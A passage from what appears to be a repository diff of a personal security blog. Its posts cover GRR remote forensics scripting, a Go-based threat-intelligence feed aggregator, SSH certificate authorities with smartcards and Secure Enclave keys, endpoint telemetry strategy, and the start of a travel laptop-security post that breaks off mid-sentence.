If you are like me and got introduced to forensics through academia, you will like that GRR builds on Sleuthkit through pytsk for disk forensics (actually you may choose what layer you'd like to stay on). When you've retrieved an item, I just love that it gets placed in a virtual file system in GRR with complete versioning.

The virtual filesystem is where all the stuff you've retrieved or queried the client about is stored, with versioning, for your pleasure. In addition to having a way-to-go console application, GRR provides a good web GUI which gives an intuitive way of browsing about everything you can do in the console. I think the console is where Google would like you to live though.

And so I ended up in the grr_console, which is a purpose-built iPython shell, writing scripts for doing what I needed it to do. Remember that call spec that I mentioned initially; here is where it comes into play. Below you see an example using the GetFile call spec (notice that the pathspec in the flow statement says OS; this might as well have been ``REGISTRY`` or ``TSK``):

|
||||||
|
    # Token identifying who is asking and why (used for auditing).
    token = access_control.ACLToken(username="someone", reason="Why")

    flows = []
    path = "/home/someone/nohup.out"

    # Start a GetFile flow on every client matching the hostname search,
    # remembering which client each flow belongs to.
    for client in SearchClients('host:Webserver'):
        id = client[0].client_id
        o = flow.GRRFlow.StartFlow(client_id=str(id),
            flow_name="GetFile",
            pathspec=rdfvalue.PathSpec(path=path,
                pathtype=rdfvalue.PathSpec.PathType.OS))
        flows.append((o, id))

    # Poll the flows and read the file from the client's virtual
    # filesystem once the corresponding flow has finished.
    files = []
    while len(flows) > 0:
        for o, id in list(flows):
            f = aff4.FACTORY.Open(o)
            r = f.GetRunner()
            if not r.IsRunning():
                fd = aff4.FACTORY.Open(str(id) + "/fs/os%s" % path, token=token)
                files.append(str(fd.Read(10000)))
                flows.remove((o, id))
If you are interested in Mandiant MIR and its concept, I'd like to
recommend another YouTube video, by Douglas Wilson, which is quite
awesome as well [7].

Update 2020: Today I wouldn't recommend MIR/FireEye HX, but rather
something like LimaCharlie [8], due to the lack of hunting
capabilities in the HX platform.
[1] https://github.com/google/grr

[2] http://www.fireeye.com/products-and-solutions/endpoint-forensics.html

[3] https://grr-doc.readthedocs.io/en/latest/installing-grr-server/index.html

[4] https://2459d6dc103cb5933875-c0245c5c937c5dedcca3f1764ecc9b2f.ssl.cf2.rackcdn.com/lisa13/castle.mp4

[5] GRR: Find All The Badness - https://docs.google.com/file/d/0B1wsLqFoT7i2Z2pxM0wycS1lcjg/edit?pli=1

[6] Jaffe, Marley. GRR Capstone Final Paper

[7] NoVA Hackers Doug Wilson - Lessons Learned from using OpenIOC: https://www.youtube.com/watch?v=L-J5DDG_SQ8

[8] https://www.limacharlie.io/
219  data/signals-feeds.md  Normal file
@@ -0,0 +1,219 @@
## Key Takeaways

* It is possible to index and tag a high number of RSS, OTX and
  Twitter articles on limited computational power in seconds
* Building logic around timestamps is complex
* Structuring the resulting data in a graph is meaningful

## Introduction
Today I am sharing some details about one of the multi-year
projects I am running. The project motivation is:

> To stay up to date on cyber security developments within days.

I didn't want a realtime alerting service, but an analysis tool to
gather important fragments of data over time. These fragments
make up the basis of my open source research. The curated
information usually ends up on a channel like an NNTP feed,
sometimes with added comments.

My solution was to create a common interface to ingest and search
content from third-party sources. Achieving this is difficult and
requires some work, but I found it feasible.

Going through some basic research I found that much of what
happens on the web eventually ends up in one of the following
three places (e.g. as a mention):

1. OTX
2. Twitter
3. RSS

After some work I found that there were two things important to me
in the first iteration:

1. Being able to recognize the characteristics of the content
2. Knowing the publish time of the data

The primary problem was thus to build a program that scales to a
large number of feeds.

Going from there I built a prototype in Python, which I've now
matured into a more performant Golang version. What follows from
here is my experience from that work. A rough sketch of how the
ingest part fits together follows the component list below.

The tested component list of the program I am currently running is:

* Gofeed [1]
* Badger [2]
* Apache Janusgraph [3,4]
* Apache Cassandra [5]
* Go-Twitter [6]
* Alienvault OTX API [7]
* Araddon Dateparse [8]

[1] https://github.com/mmcdole/gofeed
[2] https://github.com/dgraph-io/badger
[3] https://janusgraph.org
[4] https://docs.janusgraph.org/basics/gremlin/
[5] https://cassandra.apache.org
[6] https://github.com/dghubble/go-twitter/twitter
[7] https://github.com/AlienVault-OTX/OTX-Go-SDK/src/otxapi
[8] https://github.com/araddon/dateparse
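
As a rough, minimal sketch (not the production code) of how the first
of these components is used, the following fetches a few feeds
concurrently with gofeed and a small worker pool; the feed URLs and
the pool size are arbitrary examples.

    package main

    import (
        "fmt"
        "sync"

        "github.com/mmcdole/gofeed"
    )

    func main() {
        // Example feed list; the real program reads a much larger
        // set from its own configuration.
        feeds := []string{
            "https://www.reddit.com/r/netsec/.rss",
            "http://www.reddit.com/r/Malware/.rss",
        }

        jobs := make(chan string)
        var wg sync.WaitGroup

        // A small, bounded worker pool keeps memory and socket usage
        // predictable even with thousands of feeds.
        for w := 0; w < 4; w++ {
            wg.Add(1)
            go func() {
                defer wg.Done()
                fp := gofeed.NewParser()
                for url := range jobs {
                    feed, err := fp.ParseURL(url)
                    if err != nil {
                        fmt.Println("skip:", url, err)
                        continue
                    }
                    fmt.Println(feed.Title, "-", len(feed.Items), "items")
                }
            }()
        }

        for _, url := range feeds {
            jobs <- url
        }
        close(jobs)
        wg.Wait()
    }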

## The Lesson of Guestimation: Not All Feeds Are Created Equal

Timestamps are perhaps some of the more challenging things to
interpret in a crawler and search engine. RSS is a loose standard,
at least when it comes to implementation. This means that
timestamps may vary: localized, invalid per the RFC standards,
ambiguous, missing and so on. Much like the web otherwise. Luckily
without javascript.

The goal is simply to recognize which timestamp is the most
correct one. A feed may contain one form of timestamp, while a
website may indicate another one. To solve this I use and compare
two levels of timestamping:

* The feed published, updated and all items' individual timestamps
* The item and website last-modified timestamps

Looking back, solving the first level of timestamping was
straightforward. These timestamps are present in the feed, and for
RSS the logic to build a list of timestamps would look like this:

    /* First we check the timestamp of all
     * feed items (including the primary).
     * We then estimate which is the newest
     * one. */
    var feedElectedTime time.Time
    var ts = make(map[string]string)
    ts["published"] = feed.Published
    ts["updated"] = feed.Updated
    var i = 0
    for _, item := range feed.Items {
        ts[strconv.Itoa(i)] = item.Published
        i++
        ts[strconv.Itoa(i)] = item.Updated
        i++
    }
    feedElectedTime, _, err = tsGuestimate(ts, link, false)

The elected time can be used to compare with a previous feed
checkpoint to avoid downloading all items again. Using the above
logic I was also able to dramatically increase the success rate of
the program, since it requires a valid timestamp. The
`tsGuestimate` logic is something for a future post.

Further, the item/website timestamps require a similar method, but
in addition I found it an advantage to do an HTTP HEAD request to
the destination URL and combine the result with the timestamps
available from the feed. The central and important aspect here is
to abort retrieval if an item already exists in the database; this
dramatically cuts down the processing in each run.
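
A hedged sketch of that second level: issue an HTTP HEAD request
against the destination URL, parse its Last-Modified header with
Araddon Dateparse, and skip items that are already known. The
seen-map below stands in for the database lookup the real program
does; the function and variable names are illustrative only.

    package main

    import (
        "fmt"
        "net/http"
        "time"

        "github.com/araddon/dateparse"
    )

    // lastModified does a HEAD request and tries to parse the
    // Last-Modified header into a timestamp.
    func lastModified(url string) (time.Time, error) {
        resp, err := http.Head(url)
        if err != nil {
            return time.Time{}, err
        }
        defer resp.Body.Close()
        return dateparse.ParseAny(resp.Header.Get("Last-Modified"))
    }

    func main() {
        // Stand-in for the on-disk index keyed on the item URL or hash.
        seen := map[string]bool{}

        url := "https://example.com/some-article"
        if seen[url] {
            return // abort retrieval: the item is already indexed
        }
        if ts, err := lastModified(url); err == nil {
            fmt.Println(url, "last modified", ts)
        }
        seen[url] = true
    }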

False timestamps are a problem. I noticed that websites publish
feeds with dynamic timestamps, which means that when you retrieve
the feed it carries the timestamp of now. This obviously creates
resource-intensive operations, since the whole feed is then at risk
of being re-indexed on each run.
## Noise Reduction: Recognizing Content Characteristics

Retrieving content is possible in several ways. For recognizing the
content I opted for regex, and have had good coverage with it. This
is also one of the good things about curating articles: experience
with questions such as "why did I miss this article?" evolves into
a new iteration of the program input.

For instance, to stay on top of targeted cyber operations, I found
that much-used phrases in articles were "targeted attack" and
"spear phishing". So based on that I deployed the following
keyword search (regular expression), which applies to every new
item ingested:

    "targeted":"(?i)targeted\\satt|spear\\sp",

So a new article containing "targeted attack" in the body or title
is tagged with the hotword "targeted". Another hotword could be
"breach".

Perhaps not surprisingly, this data can be modelled in a graph as
follows.

    Tweet ─> URL in tweet ┌─> Targeted
                          └─> Breach
## A Practical Example

Traversing a news graph, we can go from the hotword "targeted" to
all items and articles for the past days linked to the hotword.

I use Gremlin for querying. An example is shown below (some
details omitted):

    keyw="targeted"
    _date="2021-02-10"
    g.V().hasLabel('hotword').has('title',keyw).as("origin_hw").
      in().in().hasLabel('article:m').has('timestamp',gte(_date)).order().by('timestamp',asc).as('article').
      select("origin_hw","article").by(values('title','timestamp'))

The procedure above, summarized:

1. Find the node with the keyword "targeted"
2. Find all articles (for instance a tweet) that are two steps out
   from the keyword (since these may be linked via a content node)
3. Get the title and timestamp from the hotword and the article

Using a match, which was incidentally not a tweet but an article
from an RSS feed, we find the following:

    ==>{origin_hw=targeted, article=WINDOWS KERNEL ZERO-DAY EXPLOIT (CVE-2021-1732) IS USED BY BITTER APT IN TARGETED ATTACK}

Retrieving the article with Gremlin, we can determine the source:

    gremlin> g.V().has('title','WINDOWS KERNEL ZERO-DAY EXPLOIT (CVE-2021-1732) IS USED BY BITTER APT IN TARGETED ATTACK').valueMap()

    ==>{link=[https://www.reddit.com/r/netsec/.rss],
    title=[WINDOWS KERNEL ZERO-DAY EXPLOIT (CVE-2021-1732) IS USED BY BITTER APT IN TARGETED ATTACK],
    src=[Reddit - NetSec],
    src_type=[rss],
    sha256=[8a285ce1b6d157f83d9469c06b6accaa514c794042ae7243056292d4ea245daf],
    added=[2021-02-12 10:42:16.640587 +0100 CET],
    timestamp=[2021-02-10 20:31:06 +0000 +0000],
    version=[1]}

    ==>{link=[http://www.reddit.com/r/Malware/.rss],
    title=[WINDOWS KERNEL ZERO-DAY EXPLOIT (CVE-2021-1732) IS USED BY BITTER APT IN TARGETED ATTACK],
    src=[Reddit - Malware],
    src_type=[rss],
    sha256=[69737b754a7d9605d11aecff730ca3fc244c319f35174a7b37dd0d1846a823b7],
    added=[2021-02-12 10:41:48.510538 +0100 CET],
    timestamp=[2021-02-10 20:35:11 +0000 +0000],
    version=[1]}

In this instance the source was two Reddit posts which triggered
the keyword in question, and others about a targeted incident in
China. Additionally this triggered a zero-day hotword.
## Summary

Through this post I have shown some key parts of how to build a
feed aggregator that can scale to thousands of feeds on a single
computer, with update times in seconds.

I have also given a brief view of how Janusgraph and similar
systems can be used to model such data in a way which makes it
possible to search, find and eventually stay up to date on
information relevant to cyber security.

When in place, such a system may save hours per day since the data
is normalised and searchable in one place.
228  data/ssh-ca-proxyjump.md  Normal file
@@ -0,0 +1,228 @@
## Key Takeaways

* SSH has a key-signing concept that in combination with a
  smartcard provides a lean, off-disk process
* An SSH-CA provides the possibility of managing access
  without a central point of failure
* The use of an SSH jumphost is an easier way to tunnel
  sessions end-to-end encrypted, while still maintaining
  visibility and control through a central point

## Introduction

This post is an all-in-one capture of my recent discoveries with
SSH. It is an introduction for a technical audience.

It turns out that SSH is ready for a zero trust and
microsegmentation approach, which is important for the
management of servers. Everything described in this post is
available as open source software, but some parts require a
smartcard or two, such as a Yubikey (or a Nitrokey if you
prefer open source; I describe both).

I also go into detail on how to configure the CA key without
letting the key touch the computer, which is an important
principle.

The end result should be an architecture providing a better
overview of the infrastructure and a second logon factor
independent of phones and OATH.
## SSH-CA

My exploration started when I read a 2016 article by
Facebook engineering [1]. Surprised, but concerned with the
configuration overhead and reliability, I set out to test the
SSH-CA concept. Two days later all my servers were on a new
architecture.

SSH-CA works predictably, as follows:

    [ User generates key on Yubikey ]
           |
           |
           v
    [ ssh-keygen generates CA key ] --------> [ signs pubkey of Yubikey ]
       |                                        - for a set of security zones
       |                                        - for users
       |                                             |
       |                                             |
       |                                             v
       v                                      pubkey cert is distributed to user
    [ CA cert and zones pushed to servers ]   - id_rsa-cert.pub
       - auth_principals/root (root-everywhere)
       - auth_principals/web (zone-web)
The commands required in a nutshell:

    # on client
    $ ssh-keygen -t ecdsa

    # on server
    $ ssh-keygen -C CA -f ca
    $ ssh-keygen -s ca -I <id-for-logs> -n zone-web -V +1w -z 1 id_ecdsa.pub

    # on client
    $ cp id_ecdsa-cert.pub ~/.ssh/

Please refer to the next section for best-practice storage
of your private key.

On the SSH server, add the following to the SSHD config:

    TrustedUserCAKeys /etc/ssh/ca.pub
    AuthorizedPrincipalsFile /etc/ssh/auth_principals/%u
What was conceptually new for me was principals and
authorization files per server. This is how it works:

1. Add a security zone, like zone-web, during certificate
   signing - "ssh-keygen * -n zone-web *". The local username does
   not matter
2. Add a file per user on the SSH server, where zone-web
   is added where applicable -
   e.g. "/etc/ssh/auth_principals/some-user" contains "zone-web"
3. Log in with the same user as given in the zone file - "ssh some-user@server"

This is the same as applying a role instead of a name in the
authorization system, while something that identifies the user is
added to the certificate and logged when used.
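
Before distributing the certificate, it can be worth sanity-checking
that the zone actually ended up in it. Listing the certificate
contents is standard ssh-keygen behaviour; the filename is just the
example from above:

    $ ssh-keygen -L -f ~/.ssh/id_ecdsa-cert.pub

The output includes the key ID, serial, validity window and the
principals, which should match the zone given at signing time.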

This leaves us with a far better authorization and
authentication scheme than the authorized_keys approach everyone
uses. Read on to get the details for generating the CA key
securely.
## Keeping Private Keys Off-disk

An important principle I have about private keys is to
rather cross-sign and encrypt two keys than to store one on
disk. This was challenged by the SSH-CA design. Luckily I found
an article describing the details of PKCS#11 with ssh-keygen
[2]:

> If you're using pkcs11 tokens to hold your ssh key, you
> may need to run ssh-keygen -D $PKCS11_MODULE_PATH
> ~/.ssh/id_rsa.pub so that you have a public key to
> sign. If your CA private key is being held in a pkcs11
> token, you can use the -D parameter, in this case the -s
> parameter has to point to the public key of the CA.

Yubikeys on macOS 11 (Big Sur) require the yubico-piv-tool
to provide PKCS#11 drivers. It can be installed using
Homebrew:

    $ brew install yubico-piv-tool
    $ PKCS11_MODULE_PATH=/usr/local/lib/libykcs11.dylib

Similarly, the procedure for the Nitrokey is:

    $ brew cask install opensc
    $ PKCS11_MODULE_PATH=/usr/local/lib/opensc-pkcs11.so

Generating a key on-card for the Yubikey:

    $ yubico-piv-tool -s 9a -a generate -o public.pem

For the Nitrokey:

    $ pkcs11-tool -l --login-type so --keypairgen --key-type RSA:2048

Using the exported CA pubkey and the private key on-card, a
certificate may now be signed and distributed to the user.

    $ ssh-keygen -D $PKCS11_MODULE_PATH -e > ca.pub

    $ ssh-keygen -D $PKCS11_MODULE_PATH -s ca.pub -I example -n zone-web -V +1w -z 1 id_rsa.pub
    Enter PIN for 'OpenPGP card (User PIN)':
    Signed user key .ssh/id_rsa-cert.pub: id "example" serial 1 for zone-web valid from 2020-10-13T15:09:00 to 2020-10-20T15:10:40

The same concept goes for a user smartcard, except that it is
plug and play as long as you have the gpg-agent
running. When the id_rsa-cert.pub (the signed certificate of
e.g. a Yubikey) is located in ~/.ssh, SSH will find the
corresponding private key automatically. The workflow will
be something along these lines:

    [ User smartcard ] -----------> [ CA smartcard ]
            ^          id_rsa.pub          |
            |                              | signs
            |------------------------------|
              sends back id_rsa-cert.pub
## A Simple Bastion Host Setup

The other thing I wanted to mention was the -J option of
ssh, ProxyJump.

ProxyJump allows a user to confidentially, and without risk of a
man-in-the-middle (MitM), tunnel the session through a
central bastion host end-to-end encrypted.

Having end-to-end encryption for an SSH proxy may seem
counter-intuitive, since the proxy cannot inspect the
content. I believe it is the better option because:

* It is a usability compromise, but terminating the session at the
  bastion would also be a security compromise in case the bastion
  host itself is compromised.
* Network access and application authentication (and even
  authorization) go through a hardened point.
* In addition the endpoint should also log what happens on
  the server to a central syslog server.
* A bastion host should always be positioned in front of the
  server segments, not on the infrastructure perimeter.

A simple setup looks like the following:

    [ client ] ---> [ bastion host ] ---> [ server ]

Practically speaking, a standalone command will look as
follows:

    ssh -J jump.example.com dest.example.com

An equivalent .ssh/config will look like:

    Host j.example.com
        HostName j.example.com
        User sshjump
        Port 22

    Host dest.example.com
        HostName dest.example.com
        ProxyJump j.example.com
        User some-user
        Port 22

With the above configuration the user can compress the
ProxyJump SSH command to "ssh dest.example.com".
## Further Work

The basic design shown above has one property which is
probably not acceptable in larger companies: someone needs
to manually sign and rotate certificates. There are some
options mentioned in open sources, where the norm is to
avoid standing certificates on clients by having an
authorization gateway with SSO. This does however introduce
a weakness in the chain.

I am also interested in using SSH certificates on iOS, but
that has turned out to be unsupported in all apps I have
tested so far. It is however on the roadmap of Termius,
hopefully in the near future. Follow updates on this subject
in my Honk thread about it [4].

For a smaller infrastructure like mine, I have found the
manual approach to be sufficient so far.
[1] Scalable and secure access with SSH: https://engineering.fb.com/security/scalable-and-secure-access-with-ssh/

[2] Using a CA with SSH: https://www.lorier.net/docs/ssh-ca.html

[3] Using PIV for SSH through PKCS #11: https://developers.yubico.com/PIV/Guides/SSH_with_PIV_and_PKCS11.html

[4] https://cybsec.network/u/tommy/h/q1g4YC31q45CT4SPK4
94  data/ssh-certs-apple-t2.md  Normal file
@@ -0,0 +1,94 @@
## Key Takeaways

* SSH certificates can be used with the Apple T2 chip on
  macOS as an alternative to external smart cards,
  authenticated with a fingerprint per session.
* The Mac T2 chip serves as an extra security layer by creating
  private keys in the Secure Enclave.
* The CA can be stored on an external smartcard, only
  signing for access in a limited period - again limiting
  the exposure.
## Introduction

Over the past days I have been going down a deep, deep
rabbit hole of SSH proxy jumping and SSH certificates
combined with smart cards.

After playing around with smart cards for SSH, I recognized
that external smart cards such as the Yubikey or
Nitrokey are not the only possible lane to go down.

Mac computers come with a security chip called T2. This chip is
also known to host something Apple calls the Secure Enclave [1]. In
the Secure Enclave you can store keys.

It will probably not serve as an equally secure solution as
external smart cards, but it is a better balance for usability.

A T2-resident key is permanently stored in hardware on one host
only, so access needs to be signed on a per-host basis. As
such I would say the T2 and external smart cards complement
each other.

Always having the key available will bring two additional
vulnerabilities:

* If compromised, the key is always available logically
* Separation of equipment and key is not possible, e.g. in a
  travel situation

With a central pubkey directory tied to an identity
(automated), the T2 can be of better use for an enterprise
setup.
## Setting up a Private Key in Secure Enclave

While fiddling around I found sekey on Github [2]. The
project seems abandoned, but it is the Secure Enclave that
does the heavy lifting.

The short and easy setup is:

    $ brew cask install sekey
    $ echo "export SSH_AUTH_SOCK=$HOME/.sekey/ssh-agent.ssh" >> ~/.zshrc
    $ echo "IdentityAgent ~/.sekey/ssh-agent.ssh" >> ~/.ssh/config
    $ source ~/.zshrc

A keypair can now be generated in the Secure Enclave by:

    $ sekey --generate-keypair SSH
    $ sekey --list-keys

Now export the public key of the curve generated on-chip:

    $ sekey --export-key <id> > id_ecdsa.pub

Using the trick we found in our recent venture into using
smart cards for signing the key, we can use PKCS#11 without
compromising security [3]. In this case I use a Nitrokey:

    $ brew cask install opensc
    $ PKCS11_MODULE_PATH=/usr/local/lib/opensc-pkcs11.so
    $ ssh-keygen -D $PKCS11_MODULE_PATH -e > ca.pub
    $ ssh-keygen -D $PKCS11_MODULE_PATH -s ca.pub -I example -n zone-web -V +1h -z 1 id_ecdsa.pub
    Enter PIN for 'OpenPGP card (User PIN)':
    Signed user key id_ecdsa-cert.pub: id "example" serial 1 for zone-web valid from 2020-10-14T20:26:00 to 2020-10-14T21:27:51
    $ cp id_ecdsa-cert.pub ~/.ssh/

If you now try to ssh into a server using the given
certificate authority as shown in the SSH-CA post [3],
access should be granted with a fingerprint.
## A Word of Caution

The T2 has had some vulnerabilities shown recently [4]. Make
sure to include these in your risk assessment before using
it. If you won't go down the smart card route, it is still
better than storing the key on disk.
[1] https://support.apple.com/guide/security/secure-enclave-overview-sec59b0b31ff/web

[2] https://github.com/sekey/sekey

[3] https://secdiary.com/2020-10-13-ssh-ca-proxyjump.html

[4] https://inks.cybsec.network/tag/t2
250  data/telemetry.md  Normal file
@@ -0,0 +1,250 @@
Telemetry for cyber security is currently at a
crossroads. While past methods have been efficient by being
based on network monitoring, the current revolution in
encryption and the distributed workspace makes it
insufficient to rely solely on network monitoring. Through
this post we are going to focus on the current challenges.

> Telemetry is an electrical apparatus for measuring a
> quantity (such as pressure, speed, or temperature) and
> transmitting the result especially by radio to a distant
> station
> – Merriam-Webster

Telemetry, a term mostly used by AV vendors, has become
broadly applicable as services change from central to
decentralised and geographically spread. Yesterday an employee
would work at his desk from 9-5 and then go home, while
today's modern worker moves around the office area and can
basically work from anywhere in the world when they feel
like it.

In cyber security, telemetry can generally be categorised
as: 1) network-centric and 2) endpoint-based. A complete
telemetry profile is essential for being able to monitor
security events and to execute retrospective
analysis. Through my recent article on indicators [1] I
proposed a structure for indicators organised in three
levels of abstraction. In this article a telemetry profile
means something that covers a degree of these three levels.

    | Level of abstraction  |    | Formats
    |-----------------------|----|-------------
    | Behavior              |    | MITRE (PRE-)ATT&CK
    |-----------------------|--->|-------------
    | Derived               |    | Suricata+Lua, Yara
    |-----------------------|--->|-------------
    | Atomic                |    | OpenIOC 1.1
## The Challenges

There are generally two problems that need to be fully
solved when collecting data for cyber security:

* The use of encryption from end to end
* Workers, and thereby the defended environment, are or will be distributed

As of February 2017 the web was 50% encrypted [2]. Today
that number [3] is growing close to 70%.

For defense purposes, it is possible to identify malicious
traffic, such as beaconing, through metadata analysis. There
have been some developments on detecting anomalies in
encrypted content lately - namely the fingerprinting of
programs using SSL/TLS. In the future I believe this will be
the primary role of network-based detection. This is
actually a flashback to a pre-2010 monitoring environment,
when full content was rarely stored and inspected by
security teams.

An additional element to consider is the previous debate
about public key pinning, which has now evolved into
Expect-CT [4]. This means that man-in-the-middle (MitM)
techniques are going to be a no-no at some point. Yes, that
includes your corporate proxy as well.

There is one drawback and dealbreaker with the above for
security teams: it requires access to the datastream used by
the endpoints to be fully effective.

VPNs are going away as more resilient and modern network
architectures become dominant. The most promising
challenger at the moment is the BeyondCorp [5] (based on
zero trust) architecture proposed by Google more than six
years ago. A zero trust architecture means that clients will
only check in to the corporate environment at the points
that _they_ need, or when they are in the vicinity of corporate
resources. Other activity, such as browsing on external
websites, no longer goes via the corporate
infrastructure or its monitored links. Additionally, the
endpoint is easily the most common infiltration vector.

To be honest, the BeyondCorp model reflects to a larger
extent how humans actually interact with computers. Humans
have never been confined to the perimeter of the enterprise
network. This may be some of the reason for organisations
being in a currently defeatable state as well. The only ones
to confine themselves to the enterprise network are,
ironically, the network defenders.

> The only ones to confine themselves to the enterprise network are,
> ironically, the network defenders.

The battle of controlling the technology evolution is not
completely lost though; it is a matter of changing the
mindset of where data or telemetry is collected. Yesterday
it was at the corporate proxy or in the corporate
environment - today it is on the endpoint and during the
connections to valuable resources.

For endpoints, the primary challenges currently faced are:

* Maintaining the integrity of locally stored and buffered data
* The availability and transport of data to a centralised logging instance
* Confidentiality of the data in transport or at rest
* Data source consistency for central correlation of information from several
  host sources
* Raising the stakes on operational security in a cat-and-mouse
  chase between intruders and defenders

Remote logging is a subject that has gained much publicity
previously, so we are not going into depth about that here.
### Existing Tooling For Endpoints

This section was not originally a part of the scope of this
article, but I'd like to establish a baseline of parts of
the available tooling to handle the above issues. I also
believe it touches some of the endpoint challenges.

For the purpose of this article, we define the following
well-known computer abstraction stack:

1. Hardware
2. Operating System
3. Application

Hardware verification and logging is currently a more or
less unexplored field, with primarily only one tool
available to my knowledge. That tool is Chipsec [6], which has
been of interest to and integrated into the Google Rapid
Response (GRR) [7] project for some time.

Operating system logs are well understood today, and many
organisations manage logging from the host operating system
properly.

There are increasingly good event streaming and agent-based
systems available, such as LimaCharlie [8], Sysmon [9] and
Carbon Black [10]. The media focus of these platforms is on
the more trendy term "hunting", but their real purpose is
OS-level logging and pattern matching.

Further, distributed forensic platforms are available from
FireEye (HX), and an open source equivalent from Google named
GRR. GRR has been featured extensively on this site
previously. Common to these is that they do not stream
events, but rather store information on the endpoint.

Application layer logging is extremely challenging. The
logging mechanism in this regard needs to be connected to
the structure of the application itself, and there are a lot
of applications. Further, many application developers do
not focus on logging.

Application logging is important and could be seen as the
technical contextual information provided by the
endpoint. Exposed applications that are important in terms
of coverage:

* Browsers
* Email Readers
* Application Firewalls (if you have one)
* Instant Messaging Clients
* Rich Document editors, such as Excel, Word, Powerpoint

These applications are important since they are the first
point of contact for almost any technical threat. Done
right, application logs will be at a central location before
the intruder manages to get a foothold on the client. Thus,
the risk of data being misrepresented in the central system
is highly reduced (integrity).

Taking browsers and Microsoft Office as an example, there
are some options readily available:

* Firefox HTTP and DNS logging: mozilla.org [11]
* Office telemetry logging: Office Telemetry Log [12]

The above examples are not security focused as far as I
could tell; more often they are debug oriented. However, the
same data is often what we are after as well (such as: did
the document have a macro? or what is the HTTP header?).

The dependency on the application developers to create
logging mechanisms is quite a challenge in this
arena. However, I believe the solution in cases where
applications do not log sufficiently is to take advantage
of plugins. Most modern applications support plugins to
some extent.

To summarise the tooling discussion, we can populate the
computer abstraction layers with the mentioned tools.

    | Level of abstraction  |    | Tools
    |-----------------------|----|-------------
    | Application           |    | Browser, Email and so on
    |-----------------------|--->|-------------
    | Operating System      |    | LC, CB, Sysmon
    |-----------------------|--->|-------------
    | Hardware              |    | Chipsec
## Conclusions: How Do We Defend in The Future?

In this article we have defined a structure and discussed in
short one of the most prominent challenges faced by
enterprise defenders today: how do we defend in the future?

Technology. This is the point where technology alone is no
longer the sole solution to defending a network. Modern
network architectures mean that defenders need to be able
to fully comprehend and use human nature as a sensor. It
is also about building intuitive systems which make the
necessary data and information available to the
defenders. In my mind technology has never been the sole
solution either, so the technology evolution is for the
greater good.

It seems obvious and unavoidable to me that network
defenders must start looking outside the perimeter, just as
intruders have done for many years already. This means
adapting the toolsets available and lobbying for an
architecture that reflects how humans actually use
technology resources. Most people have owned private
equipment for many years (surprise), and the line between
employee and enterprise is blurred and confusing when
reality now sinks in.

This means, in the technology aspect, that an emphasis must
be put on the endpoints - and that network monitoring must
again be about the metadata of the activity. In short:
collect metadata from networks and content from endpoints.

Only this way will we, in the future, be able to create a
full telemetry profile from each device under our
responsibility.
[1] Article on indicators: /indicators/

[2] 50% encrypted: https://www.eff.org/deeplinks/2017/02/were-halfway-encrypting-entire-web

[3] that number: https://letsencrypt.org/stats/

[4] Expect-CT: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Expect-CT

[5] Beyondcorp: https://cloud.google.com/beyondcorp/

[6] Chipsec: https://github.com/chipsec/chipsec

[7] Google Rapid Response (GRR): https://github.com/google/grr-doc/blob/master/publications.adoc

[8] LimaCharlie: https://github.com/refractionPOINT/lce_doc/blob/master/README.md

[9] Sysmon: https://www.rsaconference.com/writable/presentations/file_upload/hta-w05-tracking_hackers_on_your_network_with_sysinternals_sysmon.pdf

[10] Carbon Black: http://the.report/assets/Advanced-Threat-Hunting-with-Carbon-Black.pdf

[11] mozilla.org: https://developer.mozilla.org/en-US/docs/Mozilla/Debugging/HTTP_logging

[12] Office Telemetry Log: https://msdn.microsoft.com/en-us/library/office/jj230106.aspx
361  data/travel.md  Normal file
@@ -0,0 +1,361 @@
Travelling with electronic devices is a challenge, and this is
certainly the case if you do not have a travel program for your
employees and must tinker with a new setup on a case-by-case
basis. The matter is complex even when resources are available,
as it requires full-time attention.

Some organisations choose to ignore the problem altogether;
others do not fully respect their own threat model. The
latter may be just as dangerous, as it may lead to a false sense
of security for the travellers.

This article is about establishing a technical laptop setup that
can be re-used with ease. Thus, other operational and strategic
aspects are left out. The information presented revolves around
organisations, but might as well apply to the private travel of
exposed individuals.
## Main Drivers

With that out of the way: multiple overall factors are left for
consideration. The following factors are the main drivers, and
equally important, when developing a technical model of an abroad
operation.

* Threat resiliency. Equipment on travel can never really be
  secured well enough, but it can be hardened to the degree that a
  threat actor needs to risk exposure to compromise it
* Usability for the traveller. Equipment that feels inconvenient
  will be avoided by the traveller at some point
* Usability for the supporting organisation (both security and IT
  operations). Such setups may require much time and attention to
  develop, and if there is an increasing number of travellers to
  high risk areas the setup needs to scale
* Cost. A travel program is a balance between environment,
  security and cost. If the cost and environmental impact
  surpass the value that needs to be secured, the travel program
  misses some of its value. Critical infrastructure organisations
  are a different ball game than other industries on this point.

When it comes to threats, the most prominent one is the evil maid
infiltration vector - which is basically someone gaining physical
access to a computer. Motherboard recently published an article
on how a malicious party could add a backdoor to a Dell (example
used) laptop in less than 5 minutes [1].

Other examples of relevant techniques used against travellers are:
electronic eavesdropping using cell networks, physical monitoring
of hotel rooms (e.g. camera surveillance), malicious charging
stations and so on. More details on general infiltration
techniques can be found in Mitre ATT&CK's "Initial Access"
category, each described on their wiki [1,2].
## Conceptual Overview

Now that we have reviewed the main drivers, the question is if you
can protect against the given threat model in an easily achievable
way. To assess that we will first have a look at a conceptual
model for travel. Taking a top-down approach, the travel setup
will in most cases consist of two components:

1. The devices used for travel
2. The server side infrastructure

There are arguments for a standalone operation, but the legal
ramifications and practical impact of sending an employee into a
hostile environment with anything but local encryption are risky at
best. To note: that is, if the user will actually produce or carry
anything of value. If not, a standalone setup may in some cases be
argued for.

Tactical no-brainers when travelling are the following:

1. The system should disclose as little as possible about the
   traveller's pattern of activity and content
2. As little information as possible should be at rest on devices
   at risk
3. It should come at a high cost to compromise the endpoint, both
   for physical and technical exploitation
4. The equipment should never be connected to an organisation's
   service infrastructure directly before, during or after travel
5. The system should not be obviously provocative to locals -
   e.g. during airport inspections.

As far as I have found, there is currently one desktop system
that sufficiently meets these criteria - and that is ChromeOS,
which comes with sane default settings, has a really minimal
configuration and is usable to an average person. However,
ChromeOS is not a mobile operating system - and for that purpose
iOS and Android are a better fit, even though they do not tick off
all the above boxes.

With that in mind the following model, which I have named "The
Tactical Travel Protection Model", provides a hardened, basic
infrastructure setup that uses cloud providers to hide in plain
sight.

![The Tactical Travel Protection Model shows the concept of a full stack travel setup](/static/img/data/tactical_travel_protection_model.png)

The model is further detailed in the following sections.
## Scalability and Technical Implementation

With the conceptual model shown in the last section, it is time to
dive into implementation in a practical situation. The beauty of
the model is its modularity, so a component - such as a cloud
server - can easily be put in a local and physically controlled
